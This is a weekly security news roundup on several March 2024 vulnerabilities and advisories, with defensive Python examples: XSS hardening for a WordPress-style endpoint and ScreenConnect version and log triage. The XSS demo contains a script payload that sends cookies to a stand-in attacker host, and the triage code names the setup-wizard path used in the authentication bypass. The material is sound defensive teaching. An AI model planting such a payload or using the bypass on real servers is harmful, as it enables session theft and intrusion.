TheCyberThrone Security Week In Review – March 2, 2024

Lazarus Group Exploits Windows Kernel Vulnerability -CVE-2024-21338

Avast has uncovered details surrounding a zero-day exploit actively used by the Lazarus Group, targeting a vulnerability in the Windows appid.sys driver. This kernel-level vulnerability allowed attackers to deploy an advanced, stealthy rootkit, named “FudModule.”

The vulnerability lives in the `appid.sys` AppLocker driver and is tracked as CVE-2024-21338 (CVSS 7.8), a Windows Kernel Elevation of Privilege bug. It is not remotely exploitable on its own: an attacker who already has code execution on the host launches a specially crafted application that abuses the driver to gain SYSTEM privileges, and from there loads the FudModule rootkit into the kernel. Microsoft shipped the fix in the February 2024 Patch Tuesday updates, so the practical check is whether that month's cumulative update is installed on every Windows host.

WordPress LiteSpeed Cache Plugin Vulnerability – CVE-2023-40000

A Cross-Site Scripting (XSS) vulnerability was recently discovered in the WordPress plugin LiteSpeed Cache. With over 5 million active installations, this plugin is a popular choice for website performance optimization. The vulnerability could have allowed unauthenticated attackers to inject malicious code into vulnerable websites, opening the door for sensitive data theft, defacement, and privilege escalation.

The vulnerability, tracked as CVE-2023-40000 with a CVSS score of 8.3, exists because of insufficient input sanitization and output escaping in the plugin's update_cdn_status function. Combined with a missing access control on the REST API endpoint that reaches that function, an unauthenticated request could store a payload that is later rendered unescaped in the WordPress admin, which is what makes it a stored XSS rather than a reflected one. Site owners should update the plugin to a release that includes the fix.
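The two controls the advisory describes as missing, an access check on the endpoint and escaping of the stored value, are easiest to see side by side. The following is an added example written for this review in Python (the plugin itself is PHP); it is not LiteSpeed's code, the request and store objects are constructed stand-ins, and the function names mirror the page's `update_cdn_status` only for readability. The hardened version corresponds to what a WordPress developer would do with a `permission_callback` on the REST route, `sanitize_text_field()` on the way in and `esc_html()`/`esc_attr()` on the way out.

```python
import html
import re

# Constructed payload for the demonstration; not taken from a real report.
ATTACKER_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


class OptionStore:
    """Stand-in for the WordPress option the plugin writes and later renders."""

    def __init__(self):
        self.cdn_status = ""


def vulnerable_update_cdn_status(store, request):
    """Illustrative weak handler: no capability check and the raw value is stored."""
    store.cdn_status = request["body"].get("status", "")
    return 200


def vulnerable_render(store):
    """Illustrative weak output: stored text is interpolated into admin HTML unescaped."""
    return f"<div class='cdn-status'>{store.cdn_status}</div>"


def sanitize_text(value, max_len=200):
    """Rough analogue of WordPress sanitize_text_field(): drop tags and
    non-printable characters, trim, and bound the length."""
    value = re.sub(r"<[^>]*>", "", value)
    value = "".join(ch for ch in value if ch.isprintable())
    return value.strip()[:max_len]


def hardened_update_cdn_status(store, request):
    """Hardened handler with the two controls the advisory says were missing."""
    # 1. Access control, the equivalent of a permission_callback on the REST route:
    #    reject anyone without the capability before touching any input.
    if not request["user"].get("can_manage_options", False):
        return 403
    # 2. Input sanitisation before persisting.
    status = request["body"].get("status", "")
    if not isinstance(status, str):
        return 400
    store.cdn_status = sanitize_text(status)
    return 200


def hardened_render(store):
    """Output escaping (esc_html()/esc_attr() equivalent): whatever was stored
    is shown as text, never interpreted as markup."""
    return f"<div class='cdn-status'>{html.escape(store.cdn_status, quote=True)}</div>"


def demo():
    """Run the same unauthenticated payload through both versions and return what each renders."""
    anon = {"user": {}, "body": {"status": ATTACKER_PAYLOAD}}
    admin = {"user": {"can_manage_options": True}, "body": {"status": ATTACKER_PAYLOAD}}

    weak = OptionStore()
    results = {
        "vuln_status": vulnerable_update_cdn_status(weak, anon),
        "vuln_html": vulnerable_render(weak),
    }

    safe = OptionStore()
    results["hard_anon_status"] = hardened_update_cdn_status(safe, anon)
    results["hard_admin_status"] = hardened_update_cdn_status(safe, admin)
    results["hard_html"] = hardened_render(safe)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the hardened path keeps both controls: escaping on output alone would still let an anonymous caller overwrite the setting, and the permission check alone would still let a compromised admin account plant a script that fires for every other admin.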

BlackCat ransomware retaliation advisory notice from US authorities

The ALPHV/BlackCat ransomware gang is targeting the healthcare sector following its threats to retaliate against law enforcement interference, according to a joint advisory by the FBI, CISA and HHS released Tuesday.

The group claimed responsibility for a recent attack on Change Healthcare and said it stole 6 TB of data. The information reportedly taken includes Change Healthcare solution source code and data on thousands of healthcare providers, pharmacies and insurance providers.

NIST Releases Cybersecurity framework 2.0

The National Institute of Standards and Technology (NIST) has released its Cybersecurity Framework (CSF) 2.0; the draft was published last year. NIST released the first CSF in 2014, at the direction of a presidential executive order, to help organizations, and critical infrastructure in particular, manage cybersecurity risk.

CSF 2.0 builds on the earlier versions' risk-reduction guidance and broadens the intended audience beyond critical infrastructure to organizations of any size and sector. It also adds a sixth core function, Govern, alongside Identify, Protect, Detect, Respond and Recover.

ConnectWise Critical Vulnerability CVE-2024-1709

ConnectWise, a widely used provider of remote access software, disclosed two severe flaws in its ScreenConnect product. They pose an immediate danger: exploitation in the wild has already been observed.

CVE-2024-1708 (CVSS 8.4) is a path-traversal vulnerability that lets an attacker execute code or reach sensitive data on the server. On its own it requires a high-privilege account, which is why it matters mainly as the second step after the bypass below. ScreenConnect 23.9.7 and earlier are affected.

CVE-2024-1709 (CVSS 10) is an authentication bypass that gives an unauthenticated attacker administrative access to the instance and to every endpoint it manages. Again, 23.9.7 and earlier are affected; the fix ships in 23.9.8. A public proof of concept exists, so exposed servers should be upgraded immediately and reviewed for newly created admin users and unexpected activity.
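Two checks a responder wants for this item are a version gate (is the server at or past 23.9.8) and a quick triage of the web server logs. The following Python is an added example written for this review, not ConnectWise's code or a tool the page mentions. The fixed version and the setup-wizard request path with a trailing slash come from the public vendor and researcher reporting on the bypass, not from this page; the log lines are constructed in IIS W3C field order for the demonstration and do not come from a real incident.

```python
import re

# First ScreenConnect release carrying the fix for CVE-2024-1708 and CVE-2024-1709.
FIXED_VERSION = (23, 9, 8)


def parse_version(text):
    """Normalise '23.9.7.8908' or '23.9.8' to a comparable tuple of the first three numbers."""
    parts = re.findall(r"\d+", text)
    if len(parts) < 3:
        raise ValueError(f"unrecognised ScreenConnect version: {text!r}")
    return tuple(int(p) for p in parts[:3])


def is_vulnerable(version_text):
    """True when the server is 23.9.7 or earlier."""
    return parse_version(version_text) < FIXED_VERSION


# Constructed IIS W3C-style log lines for the demonstration; not from a real incident.
# Field order: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username
#              c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2024-02-21 10:02:11 10.0.0.5 GET /Login.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2024-02-21 10:02:14 10.0.0.5 GET /SetupWizard.aspx/ - 443 - 203.0.113.7 python-requests/2.31 200
2024-02-21 10:02:19 10.0.0.5 POST /SetupWizard.aspx/ - 443 - 203.0.113.7 python-requests/2.31 302
2024-02-21 10:03:40 10.0.0.5 GET /Administration - 443 - 203.0.113.7 python-requests/2.31 200
2024-02-21 10:05:02 10.0.0.5 GET /Host - 443 - 198.51.100.9 Mozilla/5.0 200
"""


def setup_wizard_hits(log_text):
    """Return (client_ip, method, path, status) for every request that reached the
    setup wizard. On a server that finished installation long ago there should be
    none at all; the trailing-slash form is the shape of the publicly documented bypass."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 11:
            continue
        method, path, client_ip, status = fields[3], fields[4], fields[8], fields[10]
        if path.lower().startswith("/setupwizard.aspx"):
            hits.append((client_ip, method, path, status))
    return hits


def triage(version_text, log_text):
    """Combine both checks into one verdict a responder can act on."""
    hits = setup_wizard_hits(log_text)
    return {
        "vulnerable_version": is_vulnerable(version_text),
        "setup_wizard_hits": hits,
        "source_ips": sorted({ip for ip, _, _, _ in hits}),
    }


if __name__ == "__main__":
    verdict = triage("23.9.7.8908", SAMPLE_LOG)
    print(f"vulnerable version: {verdict['vulnerable_version']}")
    for hit in verdict["setup_wizard_hits"]:
        print("setup wizard request:", hit)
```

A successful bypass followed by a POST to the wizard and then a 200 on the administration pages, all from one external address, is the pattern to escalate; the version check alone says nothing about whether the window was already used.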
